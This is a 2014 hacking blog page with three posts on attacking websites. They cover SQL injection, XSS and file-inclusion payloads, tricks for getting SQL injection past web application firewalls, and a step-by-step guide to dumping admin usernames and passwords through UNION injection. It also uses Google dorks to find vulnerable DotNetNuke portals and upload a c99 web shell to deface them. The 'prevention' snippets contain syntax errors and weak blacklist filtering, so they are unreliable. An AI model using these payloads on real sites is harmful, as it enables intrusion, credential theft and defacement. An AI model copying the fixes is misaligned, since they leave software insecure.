Ads 468x60px

Thursday, 31 July 2014

Website Security

 



How Can We Block Common Web Attacks And Protect Our Website..

A: SQL Injection
-->Types                   
  •  Login Form Bypassing
  •   UNION SQL Injection
           B: Cross Site Scripting
                             --> Cross Site Request Forgery
C: File Inclusion
          Types-> Remote File Inclusion and Remote Code Execution
   

On this post i am telling about five types of common web attacks, which are used in most types of defacements or dumps of databases.
The five exploits listed above are SQL injection, XSS, RCE, RFI, and LFI. Most of the time, we missed out some website code tags..
coz of this we get website attacks and allows the hacker for attack on vulnerable website.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

A: SQL Injection

--> LOGIN FORM BYPASSING

Here is an example of the vulnerable code that we can bypass very easily:

index.html file:
<form action="login.php" method="POST" />
<p>Password: <input type="text" name="pass" /><br />
<input type="submit" value="Authenticate" /></p>
</form>

login.php file:
<?php
// EXAMPLE CODE
$execute = "SELECT * from database WHERE password = '{$_POST['pass'])";
$result = mysql_query($execute);
?>

We can simply bypass this by using ' or '1=1', which will execute "password = ''or '1=1'';".

Alternatively, the user can also delete the database by executing "' drop table database; --".

PREVENTION:

Use mysql_real_escape_string in your php code.

Example:

<?php
$badword = "' OR 1 '";
$badword = mysql_real_escape_string($badword);
$message = "SELECT * from database WHERE password = "'$badword'";
echo "Blocked " . $message . ";
?>

--> UNION SQL Injection

UNION SQL injection is when the user uses the UNION command. The user checks for the vulnerability by
adding a tick to the end of a ".php?id=" file. If it comes back with a MySQL error, the site is most likely
vulnerable to UNION SQL injection. They proceed to use ORDER BY to find the columns, and at the end, they use
the UNION ALL SELECT command. An example is shown below.

http://www.site.com/website.php?id=1'

You have an error in your SQL syntax near '' at line 1 SELECT SUM(quantity)
as type FROM orders where (status='completed' OR status='confirmed' OR status='pending') AND user_id=1'

No error--> http://www.site.com/website.php?id=1 ORDER BY 1-- 

 Two columns, and it comes back with an error! This means that there is one column.
 http://www.site.com/website.php?id=1 ORDER BY 2--

Selects the all the columns and executes the version() command on the only column.
http://www.site.com/website.php?id=-1 UNION SELECT ALL version()--

SOLUTION:

Add something like below to prevent UNION SQL injection.

$evil = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($evil, "", $patch);

>-------------------------------------------------------<

B: Cross Site Scripting

Cross site scripting is a type of vulnerability used by hackers to inject code into vulnerable web pages.
If a site is vulnerable to cross site scripting, most likely users will try to inject the site with malicious javascript or try to
scam users by creating a form where users have to type their information in.
 Two types of XSS (cross site scripting) are persistent XSS and non-persistent XSS.

Example:
http://www.site.com/search.php?q=">

SOLUTION
(javascript) (Thank you, Microsoft!):

function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
    return strTemp;
}

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

C: File Inclusion

 Types: Remote File Inclusion/Local File Inclusion, and Remote Code Execution

Remote File Inclusion allows a hacker to include a remote file through a script (usually PHP). This code is mostly patched on websites, but some websites are still
vulnerable to the vulnerability. RFI usually leads to remote code execution or javascript execution.

Example of the vulnerable code:

<?php
include($_GET['page']);
?>

Exploiting it would be something like this:
http://www.site.com/page.php?page=../../../../../etc/passwd or
http://www.site.com/page.php?page=http://www.site.com/xyz.txt?

SOLUTION:

Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}

For remote code execution, the site would have to have a php executing command. You would patch this by about doing the same thing.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


 Note: Hope this post will helpful for your website to secure from these types of attacks..

Wednesday, 16 July 2014

Bypass Web Application Firewalls




Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload. Today we demonstrate some tricks to bypass Web application firewall  (WAF).

Sqli
http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5— -

By passed Sqli
http://
xyz.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— -


By Function
Capitalization:-
Some Web Application Firewalls will filter only lowercase alphabets, So we can easily bypass  by case changing.

Actual query
http://
xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—

Query to bypass the WAF

http://
xyz.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5—


By Replaced Keywords:-

Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another like below script.

Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—

Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5-- - 


We hope you enjoyed this trick.

Friday, 11 July 2014

Website Hacking



Learn How To Hack Websites With Different Techniques..   (EDUCATIONAL PURPOSE ONLY)

SQL Injection in MySQL Databases:-

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2


Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.


Step 4


We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5


In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6

In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7


Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
       One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites..

Here U can use dez two Google Dorks

1- inurl:"/portals/0"

2- inurl:/tabid/36/language/en-US/Default.aspx


You can also modify this google dork according to your need & requirement

Here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 1 :
http://www.google.com

Step 2:
Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.


Step 3:
you will find many sites, Select the site which you are comfortable with.

Step 4:
For example take this site.

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace
/Home/tabid/36/Language/en-US/Default.aspx

with this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx




Step 6: You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8: Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')


Step 9: You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 , Images, etc

After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have  & upload here.
Now  Go to main page and refresh. you have seen hacked the website.


Done..!!
 

Adf.ly


SociBuzz

EasyHits4U

The Most Popular Traffic Exchange

URLcash